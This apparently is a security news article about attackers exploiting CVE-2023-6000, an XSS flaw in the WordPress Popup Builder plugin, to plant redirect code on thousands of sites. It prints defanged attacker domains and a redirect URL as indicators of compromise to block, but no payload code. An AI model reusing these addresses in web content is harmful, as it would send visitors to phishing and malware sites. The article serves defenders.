A vulnerability in the WordPress plugin Popup Builder was used to hack 3,900 websites

Researchers warn that hackers are targeting WordPress sites using a vulnerability in outdated versions of the Popup Builder plugin. According to Sucuri, this method has already compromised over 3,900 websites in just three weeks.

The attackers are exploiting an XSS vulnerability, CVE-2023-6000, in the Popup Builder plugin (versions 4.2.3 and older), which is installed on 200,000 sites according to official statistics.

This issue was initially discovered in November 2023, and since then, it has been used for widespread attacks. For example, in early 2024, it was reported that more than 6,700 WordPress sites using the vulnerable version of the Popup Builder plugin were hacked as part of the Balada Injector malicious campaign.

Sucuri experts now warn of a new campaign targeting the same vulnerability in Popup Builder. It appears that not all administrators have installed patches, as code injections related to the new attacks can be found on 3,900 sites according to PublicWWW (Sucuri’s own scanners detected 1,170 infections).

The attacks target the Custom JavaScript or Custom CSS sections in the WordPress administrative interface, and the malicious code is stored in the wp_postmeta database table. The attackers’ primary goal is to have their malware act as an event handler for various events in Popup Builder, including sgpb-ShouldOpen, sgpb-ShouldClose, sgpb-WillOpen, sgpbDidOpen, sgpbWillClose, and sgpb-DidClose. As a result, the malicious code is triggered by specific plugin actions, such as opening or closing a popup window.

The main objective of these injections is to redirect visitors of infected sites to malicious addresses (phishing pages and sites distributing malware). In some cases, analysts observed the insertion of a redirection URL (hxxp://ttincoming.traveltraffic[.]cc/?traffic) as a redirect-url parameter for the contact-form-7 popup window.

A vulnerability in the WordPress plugin Popup Builder was used to hack 3,900 websites

The illustrated inject above retrieves a snippet of malicious code from an external source and embeds it in the web page’s header for execution by the browser. Researchers note that this method allows attackers to perform various malicious actions that could be much more severe than simple redirections.

Currently, the attacks originate from only two domains (ttincoming.traveltraffic[.]cc and host.cloudsonicwave[.]com), so specialists strongly recommend blocking them.

0 / 5

Your page rank:


Subscribe: YouTube page opens in new windowLinkedin page opens in new windowTelegram page opens in new window

Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment